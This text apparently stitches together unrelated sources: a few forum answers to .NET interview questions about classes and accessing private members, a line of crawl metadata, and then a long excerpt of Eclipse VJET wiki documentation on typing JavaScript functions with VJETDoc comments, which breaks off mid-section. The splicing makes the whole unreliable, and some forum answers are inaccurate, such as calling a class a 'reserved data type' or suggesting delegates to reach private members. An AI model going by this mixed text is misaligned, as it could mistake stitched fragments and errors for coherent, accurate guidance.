Class is a reserved data type which is used to encasulate similar type of methods and objects. For eg Cars is a class which holds Maruti 800 as object in it and tyres, seats etc are its methods ...
chintan.desai
- Jul 31st, 2009
Class is a type where you can create your own type. Just as int data type in .Net which takes only integer values and having default API's such as toString(). Similarly, you can cre...
Access Private Members
How will you access private members of a class without using Reflection?
mohitkumaris
- Dec 11th, 2009
By Creating Property, for eg: private int x;Now if we want to access it we have to make a propertyPublic int xx{get{return x;}set{x=value;}}Now in main when you create an instance of class then just use that property and access it
SasiKarasi
- Apr 23rd, 2009
By using deligates
Microsoft.NET Interview Questions
Ans | http://www.geekinterview.com/Interview-Questions/Microsoft-NET/page1 | CC-MAIN-2020-24 | refinedweb | 1,426 | 64.81 |
Opened 4 years ago
Closed 6 months ago
Last modified 6 months ago
#6297 closed enhancement (invalid)
Keep a consistent API when plug-ins subclass/override Trac classes
Description
I recently upgraded our Agilo installation to version 1.1.1. We soon found out that the upgrade broke the Mylyn connection to Eclipse, which we maintain using XML-RPC.
The cause seems to be that Agilo overrides the Milestone class with its own AgiloMilestone class. That caused the RPC namespace 'ticket.milestone' to change into 'ticket.agilomilestone', which in turn broke the Mylyn connection which relies on 'ticket.milestone.getAll'.
Now, I would not call this a bug in either product, but I think it is safe to assume that this is not the last case we will see of overriding classes in plug-ins. I would consider it a nice-to-have feature if the XML-RPC could be configured to provide a consistent API regardless of the names of the underlying implementing classes.
Attachments (0)
Change History (4)
comment:1 Changed 4 years ago by thijs
- Cc thijs added
comment:2 Changed 3 years ago by osimons
- Component changed from XmlRpcPlugin to AgiloForScrumPlugin
- Owner changed from osimons to andreat
comment:3 Changed 6 months ago by rjollos
- Resolution set to invalid
- Status changed from new to closed
You'll need to ask over on the Agilo mailing list, see AgiloForTracPlugin#BugsFeatureRequests for details. I don't think the Agilo guys monitor trac-hacks for bug reports.
comment:4 Changed 6 months ago by stefano.rago@…
@reporter: please upgrade to the latest Agilo for Trac version (currently 0.9.10/1.3.10). If you have problems/bug reports, please write to support@…
As from todays ticket #8550 discussion, I think we can safely conclude that this really is an issue for Agilo and not for the RPC plugin. RPC plugin can't possibly maintain a 'consistent API' when Agilo reworks, subclasses and replaces core Trac functionality.
RPC plugin is pluggable at all ends, and like how Agilo replaces Trac functionality there is no reason why they (or someone else) can't provide a replacement tracrpc.ticket module answering to same calls but resolving it their way.
The RPC plugin provides a functional test suite so that makes a good starting point for Agilo to test how their Trac & replacement API performs against expected RPC behavior. See my blog post for details of how to get the tests running. I'll happily apply patches with new tests if needed to further detail expected behaviour for clients. | http://trac-hacks.org/ticket/6297 | CC-MAIN-2013-48 | refinedweb | 427 | 50.36 |
.
you can replace code at runtime by the use of LD_PRELOAD (@windows you can use a similar technique called detours, quite fancy). what this does is to inform the dynamic linker to first load all libs into the process you want to run and then add some more ontop of it. you normally use it like this:
% LD_PRELOAD=./mylib.so ls
and by that you change what ls does.
ls
for your problem i would try, which you can use like:
% BIND_ADDR="ip_of_ethX" LD_PRELOAD=./bind.so twinkle
here is how you build it:
% wget -O bind.c
% gcc -nostartfiles -fpic -shared bind.c -o bind.so -ldl -D_GNU_SOURCE
a longer howto is
similar hacks and tools:
I don't think it is possible to force a process to use a certain interface.
However, I think you might be able to play with ipchain/iptables and force that a certain port your process is listening at will only get packets coming through a particular interface.
Useful HOWTO:
Usually if a program has no option for setting listening interface, it's listening on ALL interfaces. (You can verify this with lsof -i).
lsof -i
Creating iptables firewall rules that drop incoming traffic pointed towards its ports on interfaces you don't want it to be visible on is the easiest thing to do.
Why would you want a program to use an interface other than the one connected to the server to talk to that server? And if the system isn't using the interface connected to a server to talk to that server, it's a system-level (routing table) issue and has nothing to do with which process happens to want to talk to that server.
Different servers on IP networks have different IP addresses. The kernel should know which interface to use to reach a particular IP address based on the routing table. If you're trying to talk to two different servers that have the same IP address, the system will get confused (because, among other things, it only indexes the connections internally by destination address). You can make that work, but it's a system-level fix involving putting one server in a separate logical network that's only connected to the machine through software NAT.
So if they have different IP addresses, use routes to select the correct interface. If they have the same IP address, you need to use NAT so that they appear to have different IP addresses to the system.
ip netns can do this.
TL;DR:
Create network namespaces, associate interfaces to them and then run "ip netns exec NAME cmd..."
Just check if your distro supports ip netns...
(Backtrack 5r3 does not, whereas Kali does ;) )
IN MORE DETAILS:
#create netns
ip netns add myNamespace
#link iface to netns
ip link set eth0 netns myNamespace
#set ip address in namespace
ip netns exec myNamespace ifconfig eth0 192.168.0.10/24 up
#set loopback (may be needed by process run in this namespace)
ip netns exec myNamespace ifconfig lo 127.0.0.1/8 up
#set route in namespace
ip netns exec myNamespace route add default gw 192.168.0.1
#force firefox to run inside namespace (using eth0 as outgoing interface and the route)
ip netns exec firefox
Why is this better than binding the ip via LD_PRELOAD? Because LD_PRELOAD does not control the route that the processes uses. It will use the first route.
By posting your answer, you agree to the privacy policy and terms of service.
asked
3 years ago
viewed
12263 times
active
23 days ago | http://superuser.com/questions/241178/how-to-use-different-network-interfaces-for-different-processes | CC-MAIN-2014-23 | refinedweb | 599 | 70.33 |
To obtain these tools:
Install the Xcode Tools from developer.apple.com.
If you are running a version of
Xcode Tools other than 4.0, view the documentation locally:
In Xcode
In Terminal, using the man(1) command
Manual pages are intended as a quick reference
for people who already understand a technology.
To learn how the manual is organized or to learn about command syntax, read the manual page for
manpages(5).
For more information about this technology, look for other documentation in the Apple Developer Library.
For general information about writing shell scripts, read Shell Scripting Primer.
SHMGET(2) BSD System Calls Manual SHMGET(2)
NAME
shmget -- get shared memory area identifier a new shared memory segment is created, the data structure associated with it (the shmid_ds struc-ture, structure,
ture, see shmctl(2)) is initialized as follows:
• shm_perm.cuid and shm_perm.uid are set to the effective uid of the calling process.
• shm_perm.gid and shm_perm.cgid are set to the effective gid of the calling process.
• shm_perm.mode is set to the lower 9 bits of shmflg.
• shm_lpid, shm_nattch, shm_atime, and shm_dtime are set to 0
• shm_ctime is set to the current time.
• shm_segsz is set to the value of size.
• The ftok(3) function may be used to generate a key from a pathname.
RETURN VALUES
Upon successful completion a positive shared memory segment identifier is returned. Otherwise, -1 is
returned and the global variable errno is set to indicate the error.
ERRORS
The shmget() system call will fail if:
[EACCES] A shared memory segment is already associated with key and the caller has no permis-sion permission
sion. nonzero.
zero.
[ENOENT] IPC_CREAT was not set in shmflg and no shared memory segment associated with key was
found.
[ENOMEM] There is not enough memory left to created a shared memory segment of the requested
size.
[ENOSPC] A new shared memory identifier could not be created because the system limit for the
number of shared memory identifiers has been reached.
LEGACY SYNOPSIS
#include <sys/types.h>
#include <sys/ipc.h>
#include <sys/shm.h>
int
shmget(key_t key, int size, int shmflg);
All of these include files are necessary. The type of size has changed.
SEE ALSO
ftok(3), shmat(2), shmctl(2), shmdt(2), compat(5)
BSD August 17, 1995 BSD
The way to report a problem with this manual page depends on the type of problem: | http://developer.apple.com/library/mac/documentation/Darwin/Reference/ManPages/man2/shmget.2.html | CC-MAIN-2013-20 | refinedweb | 402 | 57.37 |
What is.jsonmunkák need to build a Glossary tool in javascript and fetch data from a Json file to parse in an html paragraph
I am.. retrieve the plate string from the JSON response. That is all I need.
I need a logo designed. You can tell me what type of design you need and I well design it for.
looking for lodash js developer immediatly to fix one issue to access keys in json. my budget is 600
Build me an angular website with JSON schema form [jelentkezzen be az URL megtekintéséhez] explain me how this works. Setup a database to serve the JSON ... create front end with angular to show the form built with the data coming from the database
...do that. What I now need is a SW Developer capable of helping me out it ...
I 've different files I need to load the information in the file in a excel format divided in columns.
...following characteristics: - needs to accept JSON format with social links (spotify followers, spotify playlist followers, facebook fans, instagram followers, twitter followers, youtube subscribers) - needs to decode the JSON, calculate followers from the links given, and return the number of followers in JSON - in the same moment, it needs to store the.
You will need to create the custom meta fields, everything needs to be stored professionally, there's a LOT of data that needs to be stored correctly, I will discuss more once
need API integrate a PHP of Language Detection JSON API [jelentkezzen be az URL megtekintéséhez] already apply API Key need work of [jelentkezzen be az URL megtekintéséhez] site 1. want service area markup 2. review stars in organic google results [jelentkezzen be az URL megtekintéséhez]
import search filter large json file . search edit export data in many ways xls pdf etc.. will provide sample of small file and example data inside it once we discuss. winner of this project who place best bid . thanks
Move a large number of strings from Json to Excel.
I got a 500k rows of text column and want to convert them into text column within R studio. Need help.
Hi all, Needed a little script written up in PHP. Making a cURL request and getting data back as $response in PHP. The response is in JSON and needs to be printed in HTML tables.
...com. Our website is
I need a expert who has knowledge about Azadian API Switch Modules. Rest details will be shared with winning bidder. Only experience bid .): [jelentkezzen be az URL megtekintéséhez] In case none returns anything
I need a expert who has knowledge about Azadian API Switch Modules. Rest details will be shared with winning bidder. Only experience bid .
...property data Looking to scrape right move for commercial property data in addition to zoopla that you helped me with. Rightmove commercial has a Get API to obtaining data in JSON format which iterated on index for a location and gathered , For. Eg [jelentkezzen be az URL megtekintéséhez]
Yebo!World is a geosocial app for global travellers. With the app you collect the world around you to build your own geo timeline and collects points. Check us out at [jelentkezzen be az URL megtekintéséhez] We have a robust back end in Go that you access via a JSON REST API with temporary tokens. We also have a native Android app developed in Android Studio (current...
I need<[jelentkezzen be az URL megtekintéséhez]> tree, String seperator) { for ([jelentkezzen be az U... | https://www.freelancer.hu/job-search/what-is.json/ | CC-MAIN-2018-43 | refinedweb | 581 | 72.56 |
This preview shows
pages
1–3. Sign up
to
view the full content.
View Full
Document
This
preview
has intentionally blurred sections.
Unformatted text preview: // Arup Guha // 11/7/06 // Solution for CIS 3362 DES Project // There are many weaknesses in this solution due to my laziness! // All of the constants in the algorithm should be stored in final // static variables, but I just wanted to read in the information // from the files instead of hard-coding them. // Also, the key should stay the same for encrypting one file, but // the blocks must change. This hasn't been indicated clearly. // Edited by Nickie McCall for 2010 Assignment import java.io.*; import java.util.*; public class DES { private int key; private int roundkeys; private int block; private static int stables; private static int IP; private static int IPInv; private static int E; private static int PC2; private static int P; private static int PC1; private static int keyshifts; // Reads all the information from the file I created based on the order // the values were stored in the file. My original posted file had some // errors in it, because some zeroes were stored as captial O's. I fixed // those issues in the file and have posted the corrected file with this // solution. public DES(int thekey) throws Exception { key = new int[64]; stables = new int[8][4][16]; IP = new int[64]; IPInv = new int[64]; E = new int[48]; PC2 = new int[48]; P = new int[32]; PC1 = new int[56]; keyshifts = new int[16]; block = new int[64]; // Sets the key to what was passed in. for (int i=0; i<64; i++) key[i] = thekey[i]; Scanner fin = new Scanner(new File("destables.txt")); // Reads in the initial permutation matrix. for (int i=0; i<64; i++) IP[i] = fin.nextInt(); // Reads in the inverse of the initial permutation matrix. for (int i=0; i<64; i++) IPInv[i] = fin.nextInt(); // Expansion matrix used in each round. for (int i=0; i<48; i++) E[i] = fin.nextInt(); // The permutation matrix P used in each round. for (int i=0; i<32; i++) P[i] = fin.nextInt(); // Reads in the 8 S-boxes! for (int i=0; i<8; i++) { for (int j=0; j<64; j++) { stables[i][j/16][j%16] = fin.nextInt(); } } // Reads in PC1, used for the key schedule. for (int i=0; i<56; i++) PC1[i] = fin.nextInt(); // Reads in PC2 used for the round keys. for (int i=0; i<48; i++) PC2[i] = fin.nextInt(); // Reads in the shifts used for the key between each round....
View Full Document
This note was uploaded on 07/13/2011 for the course CIS 3362 taught by Professor Staff during the Fall '08 term at University of Central Florida.
- Fall '08
- Staff
- Information Security
Click to edit the document details | https://www.coursehero.com/file/6327597/DES2/ | CC-MAIN-2017-13 | refinedweb | 477 | 74.49 |
This is the mail archive of the [email protected] mailing list for the GDB project.
> Date: Fri, 25 Nov 2011 17:41:02 +0200 > From: Eli Zaretskii <[email protected]> > > > Date: Fri, 25 Nov 2011 16:11:11 +0100 (CET) > > From: Mark Kettenis <[email protected]> > > > > >. > > But the patches suggested by Andrey didn't find any instances of the > above. So I submit that this danger is purely theoretical at this > point, or at least sufficiently rare in GDB to render this > consideration not important in practice for us. You're missing my point. A significant number of Andrey's changes (all-but-one of the ones I looked at) rename *local* variables because they have the same name as a function. My example above tries to show you that there is absolutely no problem with that, because if one wouldf accidentally try to invoke the function that has the same name as the local variable, the compiler would already generate an error. > > >. > > Clashing with library symbols _is_ a good reason to prevent GDB from > building. For *local* variables? > > And remove some perfectly usable and meaningful variable names. > > They can be easily replaced by no less meaningful and usable ones. But such a change requires one to actually read and understand the code. Such changes can therefore never be obvious, so they can't be fixed quickly. > > >! > > The same is true of any code you add or change, with the possible > exception of very trivial changes. For most changes, compiling on one system gives you reasonable confidence that things work on other systems as well. > > Most people that contribute to GDB are fairly competent programmers. > > Being competent doesn't mean being clairvoyant. How can we trust > ourselves to know by heart every single symbol in the standard > libraries? Exactly! That's why -Wshadow is so bad. Our "defs.h" pulls in lots of system headers. And on top of that we use options like _GNU_SOURCE, which invite the system to pollute the global namespace as much as it want. Since there is absolutely no problem with a local variable that has the same name as a library function, this is bad. | https://sourceware.org/legacy-ml/gdb-patches/2011-11/msg00702.html | CC-MAIN-2020-50 | refinedweb | 364 | 65.42 |
Being a contributor to the Code Project for quite some time now, it is commendable to see so many articles from various folks in the industry talk about the features of .NET and how a specific features work or what are some of the tips and tricks of the trade. This fever of .NET is very interesting to watch and rest assured that the storms caused by .NET will be as great as the storms caused by C++ when it was introduced. Walking down the web-site, I saw lots of articles on .NET, but I did not see one on: What is NET? What is it made up of? Why is there so much interest in it?
This article is a dedication to the above answers. In this article, I will give an understanding of what is .NET and why it came into existence. We will also see some of the core building blocks of .NET and how it is layered. For a deeper insight into each of the building blocks, you anyways have lots of good articles on the Code Project web site. So happy reading!
The world of computing till date has been chaotic. We have had various languages struggling to interoperate with each other, developers undergoing huge learning curves to shift from one language to another or from one application type to another, non-standard ways of modeling applications and designing solutions and huge syntactic differences between languages. The list goes on....
Past years have seen some solace in the form of enterprise "glue" applications and standards like COM, which put-forth a binary standard of interoperability between application components. But in reality, this was not always true (VB COM found it very difficult to take on VC++ COM). Also, as applications increased in their reach, it was found that rather than re-inventing the wheel for a solution, it was better to take the "service" of another applications specialized for a piece of work.
Thus from a paradigm where applications replicated code to provide common services, we have moved to a paradigm where applications are built as "collaborative units" of components working together. This simple shift has led to the collapse of the current set of architectures and demanded a new programming model:
Enter .
The .NET Framework has been developed to cater to the following objectives and requirements:
The .NET Framework is made up of two major components: the common language runtime (CLR) and the framework class library (FCL). The CLR is the foundation of the .NET Framework and provides various services that applications can use. The CLR also forms the “environment” that other applications run on. The FCL is a collection of over 7000+ types that cater to all the services, and data structures that applications will ever need.
The following diagram shows the .NET Framework, its hierarchy and the associated toolset. The diagram is so famous that you can spend some time memorizing its layout!!
At the base of the diagram, you see the operating system which can be (theoretically) any platform. The Common Language Runtime (CLR) is the substrate that abstracts the underlying operating system from your code. The minute it does this, it means that your code has to run using the services provided by the CLR and we get a new name called managed code. The CLR provides its services to applications by providing a standard set of library classes that abstract all the tasks that you will ever need. These classes are called as the Base Class Libraries. On top of this, other development platforms and applications are built (like ASP.NET, ADO.NET and so on). Language compilers that need to generate code for the CLR must adhere to a common set of specifications as laid down by the Common Language Specification (CLS). Above this, you have all the popular .NET languages.
Visual Studio .NET, then is the "glue" that helps your generate .NET applications and provides an IDE that is excellent for collaborative development.
In the subsequent sections, we will delve into the core layers of the .NET framework. Note that application development layers (like ADO.NET, ASP.NET etc) and development tools (VS.NET) are not dealt with.
The CLR is the platform on which applications are hosted and executed. The CLR also provides a set of services that applications can use to access various resources (like arrays, collections, operating system folders etc). Since this runtime "manages" the execution of your code, code that works on the CLR is called as managed code. Any other code, you guessed it, is called unmanaged code.
Compilers and tools expose the CLR's functionality and enable you to write code that benefits from this managed execution environment. To enable the runtime to provide services to managed code, language compilers must also emit metadata that describes the types that we develop in .NET. This metadata is stored along with the type file and makes it "self-describing". Using this information, the runtime automatically handles object layout and manages references to objects, releasing them when they are no longer being used.
When compilers emit code to run on the CLR, they do not emit machine language code. Rather, an intermediate language code is used called Microsoft Intermediate Language (MSIL). MSIL is like an object-oriented version of assembly language and is platform independent. It has a rich set of instructions that enable efficient representation of the code. When a code starts to execute, a process knowing as Just in Time Compilation (JIT) converts the MSIL code into the native processor instructions of the platform, which is then executed. This is shown in the following diagram:
Note that this conversion happens only once. Subsequent calls to the code will execute the native version only. Once the application dies down and is started again, this process is repeated.
The following are some of the benefits of the CLR:
Language interoperability is the ability of code to interact with code that is written using a different programming language. Language interoperability can help maximize code reuse and, therefore, improve the efficiency of the development process...
To fully interact with other objects regardless of the language they were implemented in, objects must expose to callers only those features that are common to all the languages they must interoperate with..
The common type system defines how types are declared, used, and managed in the runtime, and is also an important part of the runtime's support for cross-language integration. The common type system performs the following functions:
Windows programmers coding in C, tend to rely on the Windows API and functions in third-party DLLs to get their job done. C++ programmers often use class libraries of their own creation or standard class libraries such as MFC. Visual Basic programmers use the Visual Basic API, which is an abstraction of the underlying operating system API.
In the .NET Framework, all these anachronistic API’s are done away with. Rather a new set of functions branded as the framework class library are introduced which contain more than 7000 types.
To make learning and using the FCL more manageable, Microsoft has divided this namespace classes that represent windows, dialog boxes, menus, and other elements commonly used in GUI applications are present. A separate namespace called System.Collections holds classes representing hash tables, resizable arrays, and other data containers. Yet another namespace, System.IO, contains classes for doing file I/O.
The following diagram shows the FCL classes and their associated namespaces.
Hopefully, this article has distilled some of the terms in the .NET platform and explained why .NET is required. The .NET framework is a huge ocean and it will take some time for applications to be mature in it. Microsoft is also gearing to release its next version of server operating systems (2003) which provide lots of features for .NET applications. Expect the next version of SQL Server (code named Yukon) to have a .NET flavor too!! It is important, thus, to understand what the framework provides to us and what new features can applications target in the future and this is where this article. | http://www.codeproject.com/Articles/3992/What-is-NET?fid=15214&df=90&mpp=25&noise=5&prof=True&sort=Position&view=None&spc=None | CC-MAIN-2016-26 | refinedweb | 1,358 | 55.84 |
01 August 2012 06:35 [Source: ICIS news]
MELBOURNE (ICIS)--Korea Alcohol Industrial has reduced its domestic ethyl acetate (etac) price by won (W) 80/kg ($0.07/kg) on 1 August to boost its competitiveness over imports from China, said several importers on Wednesday.
The South Korean producer has cut its domestic etac price to W1,180/kg ex-works (EXW) for August from won (W) 1,260/kg EXW in July, the importers said.
The producer’s July pricing was itself a W80/kg reduction from June.
“[Korea Alcohol] is trying to increase its price competitiveness versus etac of ?xml:namespace>
“Inventories of imported etac are quite high at the moment, after importers bought about 8,000 tonnes for July delivery,” said a separate importer.
Purchases of Chinese etac for delivery in July were mostly concluded at $905-910/tonne (€733-737/tonne) CFR (cost & freight)
Etac of China-origin incurs a minimum anti dumping duty (ADD) of 3.14%, in addition to an import duty of 5.5%.
Korea Alcohol Industrial is
South Korean etac demand in 2011 was estimated by market sources at 90,000-100,000 tonnes. Most of the 69,000 tonnes of etac imported in 2011 came from
($1 = W1,130)
( | http://www.icis.com/Articles/2012/08/01/9582695/korea-alcohol-cuts-august-etac-prices-to-boost-competitiveness.html | CC-MAIN-2015-06 | refinedweb | 208 | 53 |
Hi!
I have trained a Resnet20 model and record the train and test losses epoch per epoch. Here is the plot
The fact that the test loss has a hieratic behaviour is an other subject (see Resnet: problem with test loss for details).
Schematically, during the training phase of the model, after all the dataloading, minimzer/scheduler init, for each epoch:
for epoch in range(start_epoch, args.epochs + 1): train_loss = train(args, model, device, train_loader, train_transforms, optimizer, epoch) test_loss = test(args, model, device, test_loader, test_transforms) # save model ... state = { 'epoch': epoch + 1, 'model_state_dict': model.state_dict(), 'scheduler_state_dict': scheduler.state_dict(), 'optimizer_state_dict': optimizer.state_dict() } torch.save(state,"model.pth")
In the
train() function:
def train(args, model, device, train_loader, transforms, optimizer, epoch, attack=None, **attack_args): # switch network layers to Training mode model.train() train_loss = 0 # to get the mean loss over the dataset (JEC 15/11/19) # scans the batches for i_batch, sample_batched in enumerate(train_loader): img_batch = sample_batched['image'] #input image ebv_batch = sample_batched['ebv'] #input redenning z_batch = sample_batched['z'] #target new_img_batch = torch.zeros_like(img_batch).permute(0, 3, 1, 2) #for CrossEntropyLoss no hot-vector new_z_batch = torch.zeros(batch_size,dtype=torch.long) for i in range(batch_size): # transform the images img = img_batch[i].numpy() for it in range(transf_size): img = transforms[it](img) new_img_batch[i] = img # transform the redshift in bin number z = (z_batch[i] - z_min) / (z_max - z_min) # z \in 0..1 => z est reel z = max(0, min(n_bins - 1, int(z * n_bins))) # z \in {0,1,.., n_bins-1} => z est entier new_z_batch[i] = z # send the inputs and target to the device new_img_batch, ebv_batch, new_z_batch = new_img_batch.to(device), \ ebv_batch.to(device), \ new_z_batch.to(device) # reset the gradiants optimizer.zero_grad() # Feedforward output = model(new_img_batch, ebv_batch) # the loss loss = F.cross_entropy(output,new_z_batch) train_loss += loss.item() * batch_size # backprop to compute the gradients loss.backward() # perform an optimizer step to modify the weights optimizer.step() # return some stat return train_loss/len(train_loader.dataset)
For the
test() function it is essentially the same code but with
model.eval()switch and
- the use of
with torch.no_grad():which is above the loop on the batches
Now, I have setup an other program for debugging. The philosophy is the following, once the last “model.pth” checkpoint is loaded
- use the same training and testing samples used for the training job described above, and also use the same random seeds init, the same data augmentation schema also
- use in place of the train/test function, a single process function which sets the model.eval() and the
with torch.no_grad():and then loops on the batches to computes the mean losses
So, I would have expected that the model parameters (notzbly the Batch Norm param stats) would be frozen, such that I would recover the test and train losses values but, this is not the case:
Train mean loss over 781 samples = 4.95804432992288 Test mean loss over 781 samples = 4.958497584095075
Have you an idea for instance why the loss computed with the same training set used during the training job is around 5 while it was around 2.5 !!!
Does the model saved at each epoch after a train followed by a test, has lost the BatchNorm parameters and so after reloading the model the two sets are recongnized as fresh sets ??? | https://discuss.pytorch.org/t/pathological-loss-values-when-model-reloaded/64545/15 | CC-MAIN-2022-33 | refinedweb | 543 | 55.64 |
Jorey Bump wrote ..
>.
As I gave as response to a recent question, this is possibly better solved
by writing:
import os
from mod_python import apache
directory = os.path.dirname(__file__)
slave = apache.import_module("slave",[directory])
def hello(req):
return slave.hello
Everyone has their own personal opinions on how best to use mod_python.
As to my own two cents worth, although mod_python uses Python, the
environment which it is running under isn't like running Python from the
command line. One is using it in the context of a web server and what
people tend to expect in doing stuff with web servers is that they can use
the same resource name in different locations of the URL namespace.
Because people are using mod_python/Python specifically to build web
applications, I believe that this expectation about using the same
resource names in multiple places is an overriding factor and any design
should accomodate this practice.
Thus, I would suggest that best practice would be:
1. Only use the "import" statement to import modules which have been
provided with Python, are installed into the "site-packages" directory
or are clearly seperated out into a directory distinct from the document
hierarchy. In this later case PythonPath should be used to denote where
that directory is.
2. That sys.path should not ever include any directory which is a part of
the document hierarchy. Unfortunately the way handlers are setup this
is done by default. This can be avoided though by setting PythonPath
explicity at the same point PythonHandler is defined. If PythonPath isn't
being defined anyway to add in extra external directories containing
application specific modules, then PythonPath should be set to "sys.path"
to ensure the document directory isn't added.
3. Always use apache.import_module() to import relative code files which
are contained within the document hierarchy. Because of (2) above, one
wouldn't be able to rely on sys.path though, so one should calculate the
exact directory that a code files resides in. This can be done by using
__file__ as described above. The directory would then be supplied to the
import module method to ensure that only that directory is searched.
In other words, a clear distinction is drawn. If it is outside the document
hierarchy, then "import" must be used with sys.path defining the search
path. Because "import" is used, modules outside of document hierarchy
must be uniquely named.
Inside the document heirarchy always use import_module() and always
define the exact directory you want something loaded from. Within the
document hierarchy, rather than calling them modules, they should be
seen as code files and duplicates should be allowed in different
directories.
All that now would need to be done is to fix import_module() so that it
copes properly with loading from the document hierarchy code files
with the same name in different directories. This isn't actually that hard
to do, but at the moment we seemed to be bogged down in arguing
about whether it is right or not.
Graham | https://modpython.org/pipermail/mod_python/2005-January/017221.html | CC-MAIN-2022-21 | refinedweb | 507 | 55.03 |
[
]
Benson Margulies commented on CXF-1084:
---------------------------------------
Here's the story. ServiceWSDLBuilder knows about TNS, but it doesn't have any visibility of
namespace maps. These live inside the namespace context of the xml schemata.
Essentially, when a databinding, (e.g. Aegis) wants to supply a namespace map, that needs
to be visible to ServiceWSDLBuilder, which needs to sort them out as a more complex version
of what it already does with target namespace comparison. If two services disagree about the
prefix map, then one of them has to be booted out into an import.
I wonder if there's a JAXB angle here related to @XmlNs.
The question here is per-schema namespace maps versus per-service. The Aegis map is at the
level of the entire databinding, so all the schema in a service (which share, of course, the
Aegis databinding instance) will share a namespace map. In Aegis, the schemas all can end
up with independent XmlNs. Those namespaces that end up at the JAX-WS level (and thus in the
Service model), can they have @XmlNs? Should prefixes float up from schemas to the service
level in JAXB? What if they conflict?
> namespace control in aegis (with jaxws) don't work for the wsdl element, only for the
schemas
> ---------------------------------------------------------------------------------------------
>
> Key: CXF-1084
> URL:
> Project: CXF
> Issue Type: Bug
> Components: Aegis Databinding
> Affects Versions: 2.0.2
> Reporter: Benson Margulies
> Assignee: Benson Margulies
>
> When aegis is used with the JaxWs front-end, the namespaceMap on the data binding has
no effect on the prefixes used for the wsdl element, and thus for the parts and related bits.
--
This message is automatically generated by JIRA.
-
You can reply to this email to add a comment to the issue online. | http://mail-archives.apache.org/mod_mbox/cxf-issues/200710.mbox/%3C28710764.1193005670832.JavaMail.jira@brutus%3E | CC-MAIN-2017-43 | refinedweb | 290 | 71.85 |
Difference between revisions of "VJET/Typing Functions with VJETDoc"
Latest revision as of 14:08, 5 December 2012
JavaScript gets its work done with Functions. As we already saw, Function is a native type in JavaScript. Similar to Array, JavaScript has more than one way to create them.
Contents
- 1 Example JavaScript functions declaration/expression
- 2 VJETDoc Structure for Functions
- 2.1 Function Ref and Function Expression
- 2.2 Typing the return type of a function
- 2.3 Typing the arguments and return type of a function
- 2.4 Function and argument names matching VJETDoc?
- 2.5 More about Function Expressions and their usage
- 2.6 Calling one function with another function as argument
- 2.7 A function returning a function
- 2.8 Typing a function in an Object Literal
- 2.9 Function Assignment
- 2.10 Functions and Globals
- 2.11 Optional Arguments
- 2.12 Variable Arguments
- 2.13 Multi-type Arguments
- 2.14 Relationship of physical function declaration and VJETDocs
- 2.15 Overloaded Functions
- 2.16 More on function signatures
- 2.17 Access Control with Overloading
- 2.18 Return types ambiguous for same args
Example JavaScript functions declaration/expression
Here are the 3 flavors of Function creation in JavaScript:
// Function declaration function max(a, b) { return (a>b) ? a : b ; }
// Function Expression via declaration w/Assignment var myMax = function(a, b) { return (a>b) ? a : b ; }
// Function Expression via Function constructor var f = new Function('a', 'b', 'return (a>b) ? a : b') var out = vjo.sysout.println ; out(max(10, 20)) ; out(f(10, 20)) ; out(myMax(10, 20)) ;
console>
20.0
20.0
20.0
The last two are really Function expressions. Those expressions could be assigned to a local variable as in the example or could be passed as an argument to another function etc...
VJETDoc Structure for Functions
Here is the Vjet structure for a function declaration:
Optional-Arg-Suffix: "?"
- Used for optional arguments.
- Optional arguments must be consecutive
- An optional argument may be the last argument declaration
- An series of optional arguments can end with a variable argument declaration
Variable-Args-Suffix: "..."
- Used for variable arguments.
- Only one allowed in a function declaration
- A variable argument may be the only argument declaration
- If present must be the last argument declaration
Argument: Type [Optional-Arg-Suffix | Variable-Args-Suffix] [Simple-Name]
Arguments: A single Argument or comma delimited list of Argument's.
Throws: A single Type or comma delimited list of thrown Type's
Function-Declaration: [Type] SimpleName "( " [Arguments] ")" ["throws" Throws]
Function-Ref: "(" Function-Declaration ")"
Function Ref and Function Expression
The last syntax, Function-Ref allows us to define a function itself as the return type from another function or be defined as the type of another functions argument(s). The parentheses are used as a grouping mechanism for clarity and are part of the required syntax. When we talk about a function-expression, we mean a function that is declared as an expression. This expression could be assigned to a variable, be an argument to some other function (like a callback) or even be returned from another function (possibly a construction-style pattern).
Typing the return type of a function
Remember that a VJETDoc can be placed before or after the function keyword in our definition. We can use the < or > to say what direction our Vjet declaration should apply to. Let's try some simple examples where we are simply defining the return type of a function.
//> Date now() function now(){ return new Date ; } function now2() { //< Date now2() return new Date ; } /*> Date now3() ; * Returns the current date */ function now3() { return new Date ; } function now4(){ /*< Date now4() ; return the current Date */ return new Date ; } var d = now() ; //< Date d = now2() ; d = now3() ; d = now4() ; var out = vjo.sysout.println ; out(now()) ; out(now2()) ; out(now3()) ; out(now4()) ;
console>
Tue Jan 18 2011 17:02:14 GMT-0800 (PST)
Tue Jan 18 2011 17:02:14 GMT-0800 (PST)
Tue Jan 18 2011 17:02:14 GMT-0800 (PST)
Tue Jan 18 2011 17:02:14 GMT-0800 (PST)
In these last examples, we could easily replace the return type Date with String or Number for example as those are valid types we can declare with. Of course we would need to change the return expression to match those types.
Typing the arguments and return type of a function
We can also type the arguments that a function expects. The following examples combine functions with a return type and typed arguments.
//> Date getDate(String) function getDate(mmDDyyyy){ return new Date(mmDDyyyy) ; } //> Date getDate(String mmDDyyyy) function getDate(mmDDyyyy){ return new Date(mmDDyyyy) ; } //> Date f(String) function getDate(mmDDyyyy){ return new Date(mmDDyyyy) ; } //> Date f(String o) function getDate(mmDDyyyy){ return new Date(mmDDyyyy) ; }
Function and argument names matching VJETDoc?
We can see that from a typing perspective we really care about the return type and what the argument type is. Thus, from the VJETDoc perspective, it is not required to have the function name or argument name(s) match between the comment and the actual function implementation. In the case of the argument, the argument name can actually be omitted. We in general, keep the names matching (reads better etc...) and always include argument names. Also, keeping them in sync is valuable when you start thinking about generated documentation that would come from just your Vjet type information. In those cases it's a good idea to have meaningful/unique names for your functions and to include the meaning/intent of functions arguments supplied. There are cases when you are typing a function expression that there is no name of the function. This is another reason we relax the requirement that names match.
More about Function Expressions and their usage
How about function expressions? We already saw a function expression typed and assigned to a variable (global or local). We also have the cases where a function expression can be passed as an argument, be assigned to an Object Literal member or even be returned from another function. Vjet structured types also use function expression to assign to globals, properties and prototypical properties. We basically then have Function declaration -- function max(a, b) { ... } and function expression function(a, b) { ... } and new Function('a', 'b', '...'). Function expressions can be created using the function keyword or by using the Function constructor. We include the Function constructor style for completeness since in almost all JavaScript you see you may not come across it. However, you will see function declarations and function keyword style usage all over the place.
Calling one function with another function as argument
The following example shows 4 flavors of passing a function as an argument to another function.
